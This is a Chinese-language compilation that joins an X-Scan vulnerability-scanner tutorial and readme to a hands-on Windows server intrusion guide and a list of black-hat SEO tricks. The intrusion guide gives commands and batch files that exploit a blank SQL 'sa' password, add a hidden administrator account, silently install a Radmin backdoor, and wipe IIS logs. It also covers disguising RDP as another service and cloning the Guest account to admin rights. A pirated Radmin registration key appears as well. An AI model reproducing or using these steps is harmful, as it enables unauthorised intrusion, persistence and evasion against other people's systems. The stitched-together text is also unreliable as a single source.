X-Scan使用问题
你试着用下面的方法使用
这里使用x-scanner作为介绍对象,原因是x-scanner集成了多种扫描功能于一身,它可以采用多线程方式对指定IP地址段(或独立IP地址)进行安全漏洞扫描,提供了图形界面和命令行两种操作方式,扫描内容包括:标准端口状态及端口banner信息、CGI漏洞、RPC漏洞、SQL-SERVER默认帐户、FTP弱口令,NT主机共享信息、用户信息、组信息、NT主机弱口令用户等。扫描结果保存在/log/目录中,index_htm为扫描结果索引文件。对于一些已知的CGI和RPC漏洞,x-scanner给出了相应的漏洞描述、利用程序及解决方案,节省了查找漏洞介绍的时间。
首先x-scanner包括了两个运行程序:xscannexe和xscan_guiexe,这两个程序分别是扫描器的控制台版本和窗口版本,作为初学者可能更容易接受窗口版本的扫描软件,因为毕竟初学者使用最多的还是“应用程序”,无论运行那一个版本,他们的功能都是一样的。首先让我们运行窗口版本看看:窗口分为左右两部分,左面是进行扫描的类型,这包括前面提到的漏洞扫描、端口扫描等基本内容;另一部分是有关扫描范围的设定,xscanner可以支持对多个IP地址的扫描,也就是说使用者可以利用xscanner成批扫描多个IP地址,例如在IP地址范围内输入21110081-2111008255就会扫描整个C类的255台服务器(如果存在的话),这样黑客可以针对某一个漏洞进行搜索,找到大范围内所有存在某个漏洞的服务器。当然如果只输入一个IP地址,扫描程序将针对单独IP进行扫描。
剩下的端口设定在前面已经介绍过,一般对于网站服务器,这个端口选取80或者8080,对于某些特殊的服务器也许还有特殊的端口号,那需要通过端口扫描进行寻找。多线程扫描是这个扫描器的一大特色,所谓多线程就是说同时在本地系统开辟多个socket连接,在同一时间内扫描多个服务器,这样做的好处是提高了扫描速度,节省时间,根据系统的资源配置高低,线程数字也可以自行设定(设定太高容易造成系统崩溃)。
在图形界面下我们看到了程序连接地址“\xscanexe”,这实际上就是xscanner的控制台程序,也就是说图形窗口只是将控制台扫描器的有关参数设置做了“傻瓜化”处理,程序运行真正执行的还是控制台程序。因此学习控制台是黑客所必需的,而且使用控制台模式的程序也是真正黑客喜爱的操作方式。
现在我们进行一个简单的cgi漏洞扫描,这次演练是在控制台模式下进行的:xscan 211100887 -port
这个命令的意思是让xscanner扫描服务器211100887的开放端口,扫描器不会对65535个端口全部进行扫描(太慢),它只会检测网络上最常用的几百个端口,而且每一个端口对应的网络服务在扫描器中都已经做过定义,从最后返回的结果很容易了解服务器运行了什么网络服务。扫描结果显示如下:
Initialize dynamic library succeed
Scanning 211100887
[211100887]: Scaning port state
[211100887]: Port 21 is listening!!!
[211100887]: Port 25 is listening!!!
[211100887]: Port 53 is listening!!!
[211100887]: Port 79 is listening!!!
[211100887]: Port 80 is listening!!!
[211100887]: Port 110 is listening!!!
[211100887]: Port 3389 is listening!!!
[211100887]: Port scan completed, found 7
[211100887]: All done
这个结果还会同时在log目录下生成一个html文档,阅读文档可以了解发放的端口对应的服务项目。从结果中看到,这台服务器公开放了七个端口,主要有21端口用于文件传输、80端口用于网页浏览、还有110端口用于pop3电子邮件,如此一来,我们就可以进行有关服务的漏洞扫描了。(关于端口的详细解释会在后续给出)
然后可以使用浏览看看这个服务器到底是做什么的,通过浏览发现原来这是一家报社的电子版面,这样黑客可以继续对服务器进行漏洞扫描查找服务器上是否存在perl漏洞,之后进行进一步进攻。
漏洞扫描的道理和端口扫描基本上类似,例如我们可以通过扫描器查找61135501到6113550255这255台服务器上所有开放了80端口的服务器上是否存在漏洞,并且找到存在什么漏洞,则可以使用xscan 61135501-6113550255 -cgi进行扫描,因为结果比较多,通过控制台很难阅读,这个时候xscanner会在log下生成多个html的中文说明,进行阅读这些文档比较方便。
二、扫描器使用问题:
载使用漏洞扫描器的过程中,学习者可能会经常遇到一些问题,这里给出有关问题产生的原因和解决办法。扫描器的使用并不是真正黑客生涯的开始,但它是学习黑客的基础,所以学习者应该多加练习,熟练掌握手中使用的扫描器,了解扫描器的工作原理和问题的解决办法。
1、为什么我找不到扫描器报告的漏洞?
扫描器报告服务器上存在某个存在漏洞的文件,是发送一个GET请求并接收服务器返回值来判断文件是否存在,这个返回值在HTTP的协议中有详细的说明,一般情况下“200”是文件存在,而“404”是没有找到文件,所以造成上面现象的具体原因就暴露出来了。
造成这个问题的原因可能有两种:第一种可能性是您的扫描器版本比较低,扫描器本身存在“千年虫”问题,对于返回的信息扫描器在判断的时候,会错误的以为时间信息2000年x月x日中的200是“文件存在”标志,这样就会造成误报;
另外一种可能性是服务器本身对“文件不存在”返回的头部信息进行了更改,如果GET申请的文件不存在,服务器会自动指向一个“没有找到页面”的文档,所以无论文件是否存在,都不会将“404”返回,而是仍然返回成功信息,这样做是为了迷惑漏洞扫描器,让攻击者不能真正判断究竟那个漏洞存在于服务器上。
这一问题的解决办法也要分情况讨论,一般说来第一种情况比较容易解决,直接升级漏洞扫描器就可以了,对于第二种情况需要使用者对网络比较熟悉,有能力的话可以自己编写一个漏洞扫描器,自己编写的扫描器可以针对返回文件的大小进行判断,这样就可以真正确定文件是否存在,但这种方法对使用者的能力要求较高。
2、我使用的扫描器速度和网络速度有关系嘛?
关系不大。扫描器发送和接收的信息都很小,就算是同时发送上百个GET请求一般的电话上网用户也完全可以做得到,影响扫描器速度的主要因素是服务器的应答速度,这取决于被扫描服务器的系统运行速度。如果使用者希望提高自己的扫描速度,可以使用支持多线程的扫描器,但是因为使用者本地电脑档次问题,也不可能将线程设置到上百个,那样的话会造成本地系统瘫痪,一般使用30个线程左右比较合适。
另外对于很多网络服务器来说,为了防止黑客的扫描行为,可能会在防火墙上设置同一IP的单位时间GET申请数量,这样做目的就是避免黑客的扫描和攻击,所以在提高本地扫描速度之前,应该先确认服务器没有相应的过滤功能之后再使用。
3、扫描器报告给我的漏洞无法利用是什么原因?
确切地说扫描器报告的不是“找到的漏洞”,而是找到了一个可能存在漏洞的文件,各种网络应用程序都可能存在漏洞,但是在更新版本的过程中,老版本的漏洞会被修补上,被扫描器找到的文件应该经过手工操作确认其是否是存在漏洞的版本,这可以通过阅读网络安全网站的“安全公告”获得相应知识。
对于已经修补上漏洞的文件来说,也不代表它一定不再存有漏洞,而只能说在一定程度上没有漏洞了,也许在明天,这个新版本的文件中又会被发现还存在其他漏洞,因此这需要网络安全爱好者时刻关注安全公告。当然如果攻击者或者网络管理员对编程比较熟悉,也可以自己阅读程序并力图自己找到可能的安全隐患,很多世界著名的黑客都是不依靠他人,而是自己寻找漏洞进行攻击的。
4、扫描器版本比较新,然而却从来没有找到过漏洞是什么原因?
有一些扫描器专门设计了“等待时间”,经过设置可以对等待返回信息的时间进行调整,这就是说在“网络连接超时”的情况下,扫描器不会傻傻的一直等待下去。但如果你的网络速度比较慢,有可能造成扫描器没有来得及接收返回信息就被认为“超时”而越了过去继续下面的扫描,这样当然是什么也找不到啦。
如果问题真的如此,可以将等待时间设置的长一些,或者换个ISP拨号连接。
5、扫描器报告服务器没有提供HTTP服务?
网络上大多数HTTP服务器和漏洞扫描器的默认端口都是80,而有少量的HTTP服务器并不是使用80端口提供服务的,在确认服务器的确开通了网站服务的情况下,可以用端口扫描器察看一下对方究竟使用什么端口进行的HTTP服务,网络上常见的端口还有8080和81。
另外这种情况还有一种可能性,也许是使用者对扫描器的参数设置不正确造成的,很多扫描器的功能不仅仅是漏洞扫描,有可能还提供了rpc扫描、ftp默认口令扫描和NT弱口令扫描等多种功能,因此在使用每一款扫描器之前,都应该自己阅读有关的帮助说明,确保问题不是出在自己身上。
6、扫描器使用过程中突然停止响应是为什么?
扫描器停止响应是很正常的,有可能是因为使用者连接的线程过多,本地系统资源不足而造成系统瘫痪、也可能是因为对方服务器的响应比较慢,依次发送出去的请求被同时反送回来而造成信息阻塞、还有可能是服务器安装了比较恶毒的防火墙,一旦察觉有人扫描就发送特殊的数据报回来造成系统瘫痪……
因此扫描器停止响应不能简单的说是为什么,也没有一个比较全面的解决方案,不过一般情况下遇到这种问题,我建议你可以更换其他扫描器、扫描另外一些服务器试试,如果问题还没有解决,就可能是因为扫描器与你所使用的系统不兼容造成的,大多数基于微软视窗的漏洞扫描器都是运行在Windows9X下的,如果是Win2000或者NT也有可能造成扫描器无法正常工作。
7、下载回来的扫描器里面怎么没有可执行文件?
扫描器不一定非要是可执行的exe文件,其他例如perl、cgi脚本语言也可以编写扫描器,因此没有可执行文件的扫描器也许是运行在网络服务器上的,这种扫描器可以被植入到网络上的其它系统中,不需要使用者上网就能够24小时不停的进行大面积地址扫描,并将结果整理、分析,最后通过Email发送到指定的电子信箱中,因此这是一种比较高级的扫描器,初学者不适合使用。
另外注意载下在扫描器的时候注意压缩报文件的扩展名,如果是tar为扩展名,那么这个扫描器是运行在Linux系统下的,这种其它操作平台的扫描器无法在视窗平台下应用,文件格式也和FAT32不一样。
8、扫描器只报告漏洞名称,不报告具体文件怎么办?
只要漏洞被发现,网络安全组织即会为漏洞命名,因此漏洞名称对应的文件在相当广泛的范围内都是统一的,只要知道了漏洞的名称,黑客就可以通过专门的漏洞搜索引擎进行查找,并且学习到与找到漏洞相关的详细信息。这种“漏洞搜索引擎”在网络上非常多,例如我国“绿盟”提供的全中文漏洞搜索引擎就是比较理想的一个。
原作者: 黑客防线
来 源: 黑客防线
一 系统要求:Windows NT/2000/XP/2003
理论上可运行于Windows NT系列操作系统,推荐运行于Windows 2000以上的Server版Windows系统。
二 功能简介:
采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能。扫描内容包括:远程服务类型、操作系统类型及版本,各种弱口令漏洞、后门、应用服务漏洞、网络设备漏洞、拒绝服务漏洞等二十几个大类。对于多数已知漏洞,我们给出了相应的漏洞描述、解决方案及详细描述链接,其它漏洞资料正在进一步整理完善中,您也可以通过本站的“安全文摘”和“安全漏洞”栏目查阅相关说明。
30及后续版本提供了简单的插件开发包,便于有编程基础的朋友自己编写或将其他调试通过的代码修改为X-Scan插件。另外Nessus攻击脚本的翻译工作已经开始,欢迎所有对网络安全感兴趣的朋友参与。需要“Nessus攻击脚本引擎”源代码、X-Scan插件SDK、示例插件源代码或愿意参与脚本翻译工作的朋友,可通过本站“X-Scan”项目链接获取详细资料:“http://wwwxfocusnet/projects/X-Scan/indexhtml”。
三 所需文件:
xscan_guiexe -- X-Scan图形界面主程序
checkhostdat -- 插件调度主程序
updateexe -- 在线升级主程序
dll -- 主程序所需动态链接库
使用说明txt -- X-Scan使用说明
/dat/languageini -- 多语言配置文件,可通过设置“LANGUAGE\SELECTED”项进行语言切换
/dat/language -- 多语言数据文件
/dat/configini -- 当前配置文件,用于保存当前使用的所有设置
/dat/cfg -- 用户自定义配置文件
/dat/dic -- 用户名/密码字典文件,用于检测弱口令用户
/plugins -- 用于存放所有插件(后缀名为xpn)
/scripts -- 用于存放所有NASL脚本(后缀名为nasl)
/scripts/desc -- 用于存放所有NASL脚本多语言描述(后缀名为desc)
/scripts/cache -- 用于缓存所有NASL脚本信息,以便加快扫描速度(该目录可删除)
四 准备工作:
X-Scan是完全免费软件,无需注册,无需安装(解压缩即可运行,自动检查并安装WinPCap驱动程序)。若已经安装的WinPCap驱动程序版本不正确,请通过主窗口菜单的“工具”->“Install WinPCap”重新安装“WinPCap 31 beta4”或另行安装更高版本。
五 图形界面设置项说明:
“检测范围”模块:
“指定IP范围” - 可以输入独立IP地址或域名,也可输入以“-”和“,”分隔的IP范围,如“19216801-20,192168110-1921681254”,或类似“1921681001/24”的掩码格式。
“从文件中获取主机列表” - 选中该复选框将从文件中读取待检测主机地址,文件格式应为纯文本,每一行可包含独立IP或域名,也可包含以“-”和“,”分隔的IP范围。
“全局设置”模块:
“扫描模块”项 - 选择本次扫描需要加载的插件。
“并发扫描”项 - 设置并发扫描的主机和并发线程数,也可以单独为每个主机的各个插件设置最大线程数。
“网络设置”项 - 设置适合的网络适配器,若找不到网络适配器,请重新安装WinPCap 31 beta4以上版本驱动。
“扫描报告”项 - 扫描结束后生成的报告文件名,保存在LOG目录下。扫描报告目前支持TXT、HTML和XML三种格式。
“其他设置”项:
“跳过没有响应的主机” - 若目标主机不响应ICMP ECHO及TCP SYN报文,X-Scan将跳过对该主机的检测。
“无条件扫描” - 如标题所述
“跳过没有检测到开放端口的主机” - 若在用户指定的TCP端口范围内没有发现开放端口,将跳过对该主机的后续检测。
“使用NMAP判断远程操作系统” - X-Scan使用SNMP、NETBIOS和NMAP综合判断远程操作系统类型,若NMAP频繁出错,可关闭该选项。
“显示详细信息” - 主要用于调试,平时不推荐使用该选项。
“插件设置”模块:
该模块包含针对各个插件的单独设置,如“端口扫描”插件的端口范围设置、各弱口令插件的用户名/密码字典设置等。
六 常见问题解答:
Q:如果没有安装WinPCap驱动程序是否能正常使用X-Scan进行扫描?
A:如果系统未安装WinPCap驱动,X-Scan启动后会自动安装WinPCap 31;如果系统已经安装了WinPCap更高版本,X-Scan则使用已有版本。
Q:扫描一个子网,进程里同时出现10个checkhostexe的进程是什么原因?
A:检测每个主机都会单独起一个Checkhostexe进程,检测完毕会自动退出。并发主机数量可以通过图形界面的设置窗口设定,命令行程序通过“-t”参数设定。
Q:扫描过程中机器突然蓝屏重启是什么原因?
A:扫描过程中系统蓝屏是有可能的,AtGuard、天网等防火墙的驱动程序在处理特殊包的时候有可能出错导致系统崩溃,另外很多防火墙驱动与WinPCap驱动本身也存在冲突,建议先禁止或卸载防火墙程序再试试。
Q:操作系统识别不正确是什么原因?
A:操作系统识别方面确实不能保证100%的准确率,目前是综合NMAP、P0F的指纹库、NETBIOS信息和SNMP信息进行识别,如果目标机器没有开放NETBIOS和SNMP协议,TCP/IP堆栈指纹也不在数据库中,就需要使用者根据其他信息综合分析了。
Q:为什么在一次扫描中我选择了“SYN”方式进行端口扫描,但X-Scan实际采用的是“TCP”方式,而且也没有被动识别出目标操作系统?
A:端口扫描中的“SYN”方式在NT4或XP+SP2系统下无法使用,在windows 2000等系统下使用时必须拥有管理员权限,否则将自动改用“TCP”方式进行端口扫描。
Q:新版本是否兼容23版本的插件?
A:X-Scan 30以上版本的插件接口做了少量修改,不兼容23以前版本的插件,需要原作者做相应修改。30以上版本提供了简单的开发库,插件开发方面要比23版本轻松许多。
Q:我看到Scripts目录下有很多nessus的脚本,是否可以自己从nessus的网站上下载最新的plugin,然后解压到scripts目录中,实现扫描最新漏洞?
A:X-Scan移植了nessus的nasl引擎,目前对应于nessus224,但不包含对本地检测脚本的支持。所以只要是这个版本nessus支持的非本地检测脚本,都可以复制到Scripts目录下加载。
Q:X-Scan中各项弱口令插件检测范围都很有限,能否自己加入其他需要检测的帐号或口令?
A:在“X-Scan”中内置的密码字典仅为简单示范,使用者如果希望软件有更强的密码猜解能力,可以自己编辑密码字典文件。
Q:为什么nasl脚本扫描结果中存在大量英文,将来有没有可能会对这些英文信息进行汉化?
A:目前已有将近2000个NASL脚本,里面的描述信息大都是英文,需要翻译的内容可以在本站“焦点项目”中的X-Scan下看到。欢迎大家一起帮忙翻译,通过审核后会直接加入在线升级库供大家下载。
Q:用xscanexe在命令行方式下进行扫描时,如何暂停或终止扫描?
A:命令行方式检测过程中,按“[空格]”键可查看各线程状态及扫描进度,按“[回车]”可暂停或继续扫描,按“q”键可保存当前数据后提前退出程序,按“<ctrl+c>”强行关闭程序。
Q:X-Scan如何安装,是否需要注册?
A:X-Scan是完全免费软件,无需注册,无需安装(解压缩即可运行,自动安装WinPCap驱动)。
七 版本发布:
X-Scan v33 -- 发布日期:07/18/2005,优化主程序及NASL库;修正已知BUG;更新攻击测试脚本及中文描述。
感谢wlj、killer、coolc协助测试,感谢通过各种方式提供反馈信息及建议的朋友。
X-Scan v32 -- 发布日期:04/08/2005,升级NASL库,优化主程序及NASL库;增加HTTP/TELNET/SSH/VNC/CVS/IMAP等弱口令检测插件;修正已知BUG。
感谢wlj提供大量改进建议及相关资料,感谢安全焦点全体成员和coolc、killer等朋友协助测试。
X-Scan v31 -- 发布日期:03/25/2004,修改“存活主机”插件,加入23版本中SNMP、NETBIOS插件,优化主程序及NASL库。
X-Scan v302 -- 发布日期:03/08/2004,“WinPCap 31 beta”中存在BUG,可能导致CheckHostexe异常。X-Scan中改用“WinPCap 23”,建议卸载“WinPCap 31 beta”后再使用X-Scan进行扫描。
X-Scan v30 -- 发布日期:03/01/2004,修正beta版本中已知BUG,对主程序及所有插件进行优化,升级NASL库,支持2010a版本以前的所有NASL脚本;提供简单的开发包方便其他朋友共同开发插件;其他插件正在开发中。
感谢悟休、quack帮忙精选nasl脚本列表,感谢san为支持X-Scan项目编写相关页面程序。再次感谢安全焦点论坛上所有提供优秀思路和协助测试的朋友们。
X-Scan v30(beta) -- 发布日期:12/30/2003,对主程序结构进行调整,加入移植的NASL插件,支持209版本以前的所有NASL脚本;对插件接口做少量修改,方便由其他朋友共同开发插件;对远程操作系统识别功能进行了加强,并去掉了一些可由脚本完成的插件。
感谢isno和Enfis提供优秀插件,感谢悟休、quack帮忙精选nasl脚本列表,也感谢其他提供优秀思路和协助测试的朋友。
X-Scan v23 -- 发布日期:09/29/2002,新增SSL插件,用于检测SSL漏洞;升级PORT、HTTP、IIS插件;升级图形界面并对界面风格作细微调整。
感谢ilsy提供优秀插件。
X-Scan v22 -- 发布日期:09/12/2002,修正PORT插件中线程同步BUG;修正RPC插件字符显示BUG;扩充RPC漏洞数据库;调整扫描结果索引文件风格。
感谢xundi、quack、stardust搜集并整理漏洞数据库。
X-Scan v21 -- 发布日期:09/08/2002,将SNMP插件扫描项目改为可选;将HTTP、IIS、RPC插件中的“漏洞描述”链接到xundi整理的漏洞数据库;修正20以前版本中已知BUG。
X-Scan v20 -- 发布日期:08/07/2002,新增路由信息检测、SNMP信息检测插件;升级NETBIOS插件,新增远程注册表信息检测;升级IIS插件,新增对IISASP漏洞的检测;对插件接口做细微修改;更新图形界面,新增“在线升级”功能;扩充CGI漏洞数据库;修正13以前版本中已知BUG。
感谢quack、stardust、sinister、ilsy、santa、bingle、casper提供宝贵资料或优秀插件,感谢san、xundi、e4gle协助测试,也感谢所有来信反馈和提出建议的热心朋友。
X-Scan v13 -- 发布日期:12/11/2001,修正PORT插件中关于远程操作系统识别的BUG。
X-Scan v12 -- 发布日期:12/02/2001,升级HTTP、IIS插件,新增对HTTP重定向错误页面识别功能;升级PORT插件,在无法创建Raw Socket时改为使用标准TCP连接方式检测开放端口。
X-Scan v11 -- 发布日期:11/25/2001,将所有检测功能移入插件,使主程序完全成为“容器”;提供多语言支持;更新图形接口程序;修改多线程模式,所有插件共享最大线程数量,提高并发检测速度;新增SMTP、POP3弱口令用户检测;新增IIS UTF-Code漏洞检测;扩充CGI漏洞列表。
感谢xundi、quack、casper、wollf、黄承等朋友提供的宝贵资料,感谢echo、力立等朋友协助测试,再次向付出了重体力劳动的xundi和quack致谢,涕零
X-Scan v10(beta) -- 发布日期:07/12/2001,新增对远程操作系统类型及版本识别功能;新增对远程主机地理位置查询功能;在“-iis”选项中,新增对IIS “ida/idq”漏洞的扫描,同时更新漏洞描述;在“-port”参数中,允许指定扫描的端口范围(通过修改“dat\configini”文件中的“[PORT-LIST]\port=”);在“-ntpass”参数中,允许用户在编辑密码字典时通过“%”通配所有用户名;更新CGI漏洞列表,并对CGI漏洞进行分类,以便根据远程主机系统类型扫描特定CGI漏洞,加快扫描速度。
感谢“天眼”软件作者--watercloud提供“被动识别远程操作系统”模块;感谢“追捕”软件作者--冯志宏提供“IP-地理位置”数据库;感谢quack提供漏洞资料、程序资料、无数有价值的建议还有感情和
X-Scanner v061 -- 发布日期:05/17/2001,在“-iis”选项中新增对IIS CGI文件名二次解码漏洞的检测。
X-Scanner v06 -- 发布日期:05/15/2001,新增“-iis”参数,专门用于扫描IIS服务器的“unicode”及“remote printer overflow”漏洞;更新漏洞描述;调整CGI扫描的超时时间,尽量避免因超时导致的“扫描未完成”情况出现;为避免“RedV”插件被恶意利用,将自动更换主页功能改为自动向“C:\”目录上传包含警告信息的文本文件。
X-Scanner v05 -- 发布日期:04/30/2001,修改了命令行参数,使参数含义更加直观;扩充CGI漏洞数据库;对NT弱口令扫描功能进行扩充--允许用户使用用户名及密码字典;增加插件功能,并公布插件接口。
感谢“santa”和“老鬼(colossus)”提供插件。
X-Scanner v042b -- 发布日期:03/07/2001,修正了“-b”选项在特定情况导致系统overflow的BUG。
X-Scanner v042 -- 发布日期:03/02/2001,允许用户对SQL-SERVER帐户进行扩充,而不局限于扫描“sa”空口令。
X-Scanner v041 -- 发布日期:02/19/2001,修正了以前版本中对FTP弱口令检测的BUG;重新优化代码,将xscanexe与xscan98合二为一。
X-Scanner v04 -- 发布日期:02/15/2001,加入对SQL-SERVER默认“sa”帐户的扫描;在充分认识了某些人的惰性之后,临时制作了傻瓜式图形界面(一切操作按序号点击即可)。
X-Scanner v031 -- 发布日期:01/17/2001,对端口扫描方式和输出文件的格式做了细微调整;对Unicode解码漏洞进行了扩充;提供了for win98的版本和一个简单的CGI列表维护工具。
X-Scanner v03 -- 发布日期:12/27/2000,加入线程超时限制;增加代理功能;扩充CGI漏洞数据库,加入对Unicode解码等漏洞的检测及描述;修正内存泄露问题。内部测试版。
X-Scanner v02 -- 发布日期:12/12/2000,内部测试
工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子30中文版(远程控制程序)(RADMIN注册码:
08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SCexe portbat queryexe quserexe(隐藏3389服务及 不让管理发现自己程序);CleanIISLogexe(小榕的擦PP程序);3389exe(开3389端口服务的);psuexe(使用被禁止的Guest帐户要用到的);mstscexe(远程桌面连接程序)。
一扫到SA弱口令(自动攻击器)
二用SQLTOOLS连上去建一个用户
net start telnet
开telnet服务
net user mint mint /add
添加用户mint密码为
mint net localgroup administrators mint /add
将帐号mint升级为管理员
三上传后门程序RADEXE(RADMIN服务端自解压程序)
制作RADEXE过程:
1、到Radmin安装目录下找到AdmDlldll、 raddrvdll和r_severexe;
2、在本地设置服务端(一定要生成);
设置密码-->>设置连接端口(默认4489)-->>生成
3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1reg;
4、编写一个批处理,并命名为ubat;
@echo offnet stop r_server
5、写第二个批处理,rbat,内容为:
@echo off@Explorerexe /
uninstall /silence@Explorerexe /install /
silence@regedit /s 1reg@echo off@Explorerexe /uninstall /
silence@Explorerexe /install /silence@regedit /
s 1reg@net start r_server@del
radexe@del 1reg@del rbat@del ubat
6、将AdmDLLdll raddrvdll Explorerexe(r_severexe改名) ubat rbat压缩成RadRAR压缩包;
7、将Radrar制作成自解压文件;
选择Defaultsfx的自释放模块-->>高级自释放选项
-->>常规
释放路径:%systemroot%\\system32
安装程序:释放后运行:rbat 释放前运行ubat
-->>摸式
缄默模式:全部隐藏 覆盖方式:覆盖所有文件
-->>确定-->>确定
生成完成。
四用RADMIN客服端连接
上传文件到c:\\WINNT(XP是windows):
portbat(如果是在XP下,这个要把里面的WINNT改为Windows)
queryexe quserexe
SCexe
CleanIISLogexeexe
3389exe
psuexe
最好再上传一个反弹后门RADMIN进入TELNET。
运行c:\\winnt\\3389exe,重启肉鸡。
五重启后用远程桌面远程器连上去
这里就有时会出现个问题。
使用3389登陆,发现登陆用户已满,不用怕,我们把他踢出去。
telnet对方ip,发现需要 NTLM 身份验证。我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。
找到c:\\winnt\\system32\\cmdexe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmdexe的快捷方式。输入帐号mint密码mint,telnet对方ip,直接可以登陆对方电脑了。
使用命令:
c:\\query user (查看对方目前终端登陆状况。)
运行命令:
c:\\logoff 1(踢出去一个管理者)
再用c:\\query user检查一便~~(这就是为什么不马上用1bat了)
六连上后在cmd下运行
c:\\winnt\\log 自己的IP (擦PP)
c:\\winnet\\1bat (删除覆盖查看当前在线用户文件)
七打SA空口令补丁
程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)
-->>Windowst身位验证登陆
复制一下代码:SELMIS
if exists (select from dbosysobjects where id
= object_id(N\’[dbo][xp_cmdshell]\’)
and OBJECTPROPERTY(id, N\’IsExtendedProc\’)
= 1) exec sp_dropextendedproc N\’[dbo][xp_cmdshell]\’GO
按F5(运行),关了退出SQL Server再用SQL Server身位验证进一次,退出(这是为了不留下记录)。
八改3389端口和服务名称
修改服务器端的端口设置,注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp],PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。
第二个地方:
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。
要重启系统才能用新端口连。(不急改了他的服务名再重启系统吧)
导出3389服务的
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]
的键值为mmreg文件。编辑mmreg文件,替换TermService为Alerter(错误警告服务别的服务也行) 。再把第十行的"Description"="(这里是服务说明,改为你所换的服务说明,这里改为通知所选用户和计算机有关系统管理级警报。)"第十一行的"DisplayName"="(这里是服务名称,改为你所换的服务名称,这里改为Alerter)。保存,再导入注册表(这里要先运行Servicesmsc(可在CMD下打这命令)服务管理器把Alerter的服务先停止)。
再在CMD下
CD c:\\winnt\\
system32 copy termsrvexe serviceexe
(这里是复制termsrvexe为Alerter服务文件名差不多的文件)
CD C:\\winnt sc \\\\127001 config Alerter binpath=
c:\\winnt\\system32\\serviceexe
(这里是从新定向Alerter服务文件服务名一定要区分大小写A要大写)
九注消后(注消比直接关要好些)用Radmin重启肉鸡
十使用被禁用的帐户[Guest]登陆,删除自己开始建的帐号
1使用psuexe展开注册表到
HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users
用法:[psu -p regedit -i pid]
Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogonexe后面的数值就是PID数值。
如:psu –p regedit –i 157
将Guest克成管理员权限,克成管理员权限的方法:
找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的类型值。
在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样)。
导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相应的类型值的数据),然后删除Guest的配置。
2查看计算机管理中帐户列表,刷新这时候会出现错误[找不到帐户](跳过这步也行)。
3将Guest的配置(二个REG文件导进注册表)。
4修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下]。
net user Guest
[修改密码]net user Guest /
active:yesnet user Guest /active:no[命令行下禁用Guest]
5实验被禁止的帐户Guest是否可用。
6用Guest登陆后删除自己建的帐号。
net user mint /del
整个过程结束。
最后最好把RADMIN的服务也改了,多留个后门多条路,呵呵。整个过程全部结束,这机子就真正变成你的肉鸡了
黑帽SEO不同于白帽SEO那种放长线钓大鱼的策略。黑帽SEO更注重的是短期内的利益,在利益的驱使下通过作弊手法获得很大的利益。就是采用搜索引擎禁止的方式优化网站,影响搜索引擎对网站排名的合理和公正性。但随时会因为搜索引擎算法的改变而面临惩罚。
博客作弊BLOG是一种交互性很强的工具。这几年,博客的兴起,成为了黑帽子SEO一个新的制造链接的福地。
1、BLOG群发作弊:在国内常见的一些BLOG程序如:wordpress、
ZBLOG、PJBLOG、Bo-blog。早期的ZBLOG,PJBLOG因为开发者缺乏对SEO的认识。ZBLOG和PJBLOG,一度成为黑帽子SEO们经常光顾的地方。而Bo-blog博客程序,似乎还是可以给黑帽子SEO有机可乘的地方。
2、BLOG群作弊:BLOG群建作弊,就是通过程序或者人为的手段,大量申请BLOG帐户。然后,通过发表一些带有关键词链接的文章,通过这些链接来推动关键词的搜索引擎排名。
3、BLOG隐藏链接作弊:作弊者通过提供免费的博客风格(Free
Template),在风格文件里增加隐藏链接(HideLinks)以增加网站隐藏链接,达到提高搜索引擎排名的目的。
页面跳转利用Javascript或者其他技术,使用户在到达页面之后迅速跳转到另一个页面。
偷换页面这是为SEO设计的高度优化的网页,当网站在获得理想排名后,用普通页面来替换优化过的页面。
桥页针对某一个关键字专门做一个优化页面,将链接指向或者重定向到目标页面,而且桥页本身无实际内容,只是针对搜索引擎的关键字堆砌而已。
留言本群发使用留言本群发软件可以自动发布自己的关键词URL,在短时间内迅速提高外部链接。
链接工厂“链接工厂”(亦称“大量链接机制”)指由大量网页交叉链接而构成的一个网络系统。这些网页可能来自同一个域或多个不同的域,甚至可能来自不同的服务器。一个站点加入这样一个“链接工厂”后,一方面它可得到来自该系统中所有网页的链接,同时作为交换它需要“奉献”自己的链接,籍此方法来提升链接得分,从而达到干预链接得分的目的。
隐藏链接隐藏链接一般被SEO用在客户网站上,通过在自己客户网站上使用隐藏链接的方式连接自己的网站或者是其他客户的网站。
假链接将链接添加到JS代码、框架或者是表单里面。这种方式的链接,对搜索引擎的蜘蛛来说,根本无法读取出来。因此,链接只是做给人看的,搜索引擎根本无法识别。
网页劫持网页劫持也就是我们经常所说的Page
Jacking,是将别人的网站内容或者整个网站全面复制下来,偷梁换柱放在自己的网站上。这个黑帽SEO方法是对网页内容极其匮乏的站长有吸引力的。但是,这个做法是相当冒险的,更是不耻的。搜索引擎的专利技术能从多个因素上来判断这个被复制的网页或者网站不是原创,而不予以收录。
